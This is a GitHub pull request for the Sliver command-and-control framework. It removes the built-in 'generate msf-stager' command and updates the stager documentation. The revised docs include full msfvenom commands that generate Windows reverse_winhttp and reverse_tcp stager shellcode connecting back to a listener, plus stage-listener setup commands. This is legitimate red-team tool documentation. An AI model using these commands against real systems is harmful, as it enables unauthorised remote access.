Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Removing generate msf-stager command #1751

Merged
merged 1 commit into from
Jul 18, 2024
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion client/command/exec/msf-inject.go
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,7 @@ func MsfInjectCmd(cmd *cobra.Command, con *console.SliverClient, args []string)
return
}
if pid == -1 {
con.PrintErrorf("Invalid pid '%s', see `help %s`\n", lhost, consts.MsfInjectStr)
con.PrintErrorf("Invalid pid '%d', see `help %s`\n", pid, consts.MsfInjectStr)
return
}
var goos string
Expand Down
24 changes: 0 additions & 24 deletions client/command/generate/commands.go
Original file line number Diff line number Diff line change
Expand Up @@ -48,30 +48,6 @@ func Commands(con *console.SliverClient) []*cobra.Command {

generateCmd.AddCommand(generateBeaconCmd)

generateStagerCmd := &cobra.Command{
Use: consts.MsfStagerStr,
Short: "Generate a stager using Metasploit (requires local Metasploit installation)",
Long: help.GetHelpFor([]string{consts.MsfStagerStr}),
Run: func(cmd *cobra.Command, args []string) {
GenerateStagerCmd(cmd, con, args)
},
}
flags.Bind("stager", false, generateStagerCmd, func(f *pflag.FlagSet) {
f.StringP("os", "o", "windows", "operating system")
f.StringP("arch", "a", "amd64", "cpu architecture")
f.StringP("lhost", "L", "", "Listening host")
f.Uint32P("lport", "l", 8443, "Listening port")
f.StringP("protocol", "r", "tcp", "Staging protocol (tcp/http/https)")
f.StringP("format", "f", "raw", "Output format (msfvenom formats, see help generate msf-stager for the list)")
f.StringP("badchars", "b", "", "bytes to exclude from stage shellcode")
f.StringP("save", "s", "", "directory to save the generated stager to")
f.StringP("advanced", "d", "", "Advanced options for the stager using URI query syntax (option1=value1&option2=value2...)")
})
flags.BindFlagCompletions(generateStagerCmd, func(comp *carapace.ActionMap) {
(*comp)["save"] = carapace.ActionFiles().Tag("directory/file to save implant")
})
generateCmd.AddCommand(generateStagerCmd)

generateInfoCmd := &cobra.Command{
Use: consts.CompilerInfoStr,
Short: "Get information about the server's compiler",
Expand Down
131 changes: 0 additions & 131 deletions client/command/generate/generate-stager.go

This file was deleted.

28 changes: 0 additions & 28 deletions client/command/help/long-help.go
Original file line number Diff line number Diff line change
Expand Up @@ -45,7 +45,6 @@ var (
consts.InfoStr: infoHelp,
consts.UseStr: useHelp,
consts.GenerateStr: generateHelp,
consts.MsfStagerStr: generateStagerHelp,
consts.StageListenerStr: stageListenerHelp,

consts.MsfStr: msfHelp,
Expand Down Expand Up @@ -196,33 +195,6 @@ Execution limits can be used to restrict the execution of a Sliver implant to ma
Due to the large number of options and C2s this can be a lot of typing. If you'd like to have a reusable a Sliver config
see 'help profiles new'. All "generate" flags can be saved into a profile, you can view existing profiles with the "profiles"
command.
`
generateStagerHelp = `[[.Bold]]Command:[[.Normal]] generate msf-stager <options>
[[.Bold]]About:[[.Normal]] Generate a new sliver stager shellcode and saves the output to the cwd or a path specified with --save, or to stdout using --format.

[[.Bold]][[.Underline]]++ Bad Characters ++[[.Normal]]
Bad characters must be specified like this for single bytes:

generate msf-stager -b 00

And like this for multiple bytes:

generate msf-stager -b '00 0a cc'

[[.Bold]][[.Underline]]++ Output Formats ++[[.Normal]]
You can use the --format flag to print out the shellcode to stdout, in one of the following transform formats:
[[.Bold]]bash c csharp dw dword hex java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript[[.Normal]]

[[.Bold]][[.Underline]]++ Advanced Options ++[[.Normal]]
If there are any advanced options you need to pass to msfvenom, you can use the --advanced flag to provide them. They must be provided in URI query format: option1=value1&option2=value2 and so on.
The full list of advanced options is available using "show advanced" in msf for the payload corresponding to the chosen protocol:
TCP: meterpreter/reverse_tcp
HTTP: custom/reverse_winhttp
HTTPS: custom/reverse_winhttps

Example:
To tell the stager to use the proxy proxy.corp.com:8080 with the user name "corp_drone" and password "MyPassword", you would pass the following string to --advanced:
HttpProxyHost=proxy.corp.com&HttpProxyPort=8080&HttpProxyUser=corp_drone&HttpProxyPass=MyPassword
`
stageListenerHelp = `[[.Bold]]Command:[[.Normal]] stage-listener <options>
[[.Bold]]About:[[.Normal]] Starts a stager listener bound to a Sliver profile.
Expand Down
1 change: 0 additions & 1 deletion client/constants/constants.go
Original file line number Diff line number Diff line change
Expand Up @@ -136,7 +136,6 @@ const (
C2GenerateStr = "generate"
RegenerateStr = "regenerate"
CompilerInfoStr = "info"
MsfStagerStr = "msf-stager"
ProfilesStr = "profiles"
BeaconStr = "beacon"
BeaconsStr = "beacons"
Expand Down
31 changes: 20 additions & 11 deletions docs/sliver-docs/pages/docs/md/Stagers.md
Original file line number Diff line number Diff line change
Expand Up @@ -50,7 +50,10 @@ ID Name Protocol Port

### Metasploit: Bring Your Own Stager

If you want to use [stagers generated by the Metasploit Framework with Sliver](https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/) (using `msfconsole`, `msfvenom` or the `generate stager` command), you will need to pass the additional `--prepend-size` flag to `stage-listener`, like this:
**Using Metasploit stagers is only supported on Windows.**

#### Generating an HTTP stager
If you want to use [stagers generated by the Metasploit Framework with Sliver](https://www.rapid7.com/blog/post/2022/09/16/metasploit-weekly-wrap-up-176/) (using `msfconsole` or `msfvenom`), you will need to pass the additional `--prepend-size` flag to `stage-listener`, like this:

```
sliver > stage-listener --url http://192.168.122.1:1234 --profile win-shellcode --prepend-size
Expand All @@ -60,26 +63,32 @@ This will prepend the size of the payload to the final binary sent to the stager

Sliver staging listeners only accept `tcp://`, `http://` and `https://` schemes for the `--url` flag. The format for this flag is `scheme://IP:PORT`. If no value is specified for `PORT`, an error will be thrown out.

We can now generate a stager using the `generate stager` command:
Either `msfconsole` or `msfvenom` can be used directly to generate stager shellcodes or binaries with the `custom` payload type:

```
sliver > generate stager --lhost 192.168.122.1 --lport 1234 --protocol http --save /tmp
[*] Sliver stager saved to: /tmp/CIRCULAR_BRA
msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff --format raw --out /tmp/stager.bin
```

By default, the staging protocol used is TCP. The `--protocol` flag can be used to specify either `tcp`, `http` or `https` as the staging protocol.
The generated shellcode can now be used on the target system to start a new Sliver session.
**Remark**: At the moment, the `custom/reverse_http` payload is not compatible with Sliver shellcodes (the stager crashes). However, one can use the `custom/reverse_winhttp` payload instead.

## Generating Stagers with the Metasploit Framework
Depending on the payload you choose, you can specify additional options, such as HTTP proxy settings. Use the `msfvenom` flag `--list-options` with a payload type or `show advanced` in `msfconsole`.

The Metasploit framework can also be used to generate stager shellcodes or binaries. One can use either `msfconsole` or `msfvenom` directly, and choose a `custom` payload type:
#### Generating a TCP stager
Use the `stage-listener` command to set up a listener that will send the binary to the stager:

```
msfvenom -p windows/x64/custom/reverse_winhttp LHOST=192.168.122.1 LPORT=1234 LURI=/hello.woff -f raw -o /tmp/stager.bin
silver > stage-listener --url tcp://192.168.122.1:1234 --profile win-shellcode --prepend-size
```

**Remark**: At the moment, the `custom/reverse_http` payload is not compatible with Sliver shellcodes (the stager crashes). However, one can use the `custom/reverse_winhttp` payload instead.
Notice that we are using the `tcp://` scheme because this is a TCP stager. The `--prepend-size` option is still necessary because we will be using Metasploit.

As above, either `msfconsole` or `msfvenom` can be used directly to generate stager shellcodes or binaries with the `custom` payload type. Here is an example using `msfvenom`:

```
# LHOST and LPORT should correspond to the --url parameter of your stage-listener command
msfvenom --payload windows/x64/custom/reverse_tcp LHOST=192.168.122.1 LPORT=1234 --format raw --out /tmp/stager.bin
```

## Custom Stagers

Expand Down
18 changes: 4 additions & 14 deletions protobuf/clientpb/client.pb.go

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

1 change: 0 additions & 1 deletion protobuf/clientpb/client.proto
Original file line number Diff line number Diff line change
Expand Up @@ -513,7 +513,6 @@ message MsfStagerReq {
string OS = 5; // reserved for future usage
StageProtocol Protocol = 6;
repeated string BadChars = 7;
string AdvOptions = 8;
string HTTPC2ConfigName = 9;
}

Expand Down
4 changes: 2 additions & 2 deletions protobuf/commonpb/common.pb.go

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

4 changes: 2 additions & 2 deletions protobuf/dnspb/dns.pb.go

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

Loading
Loading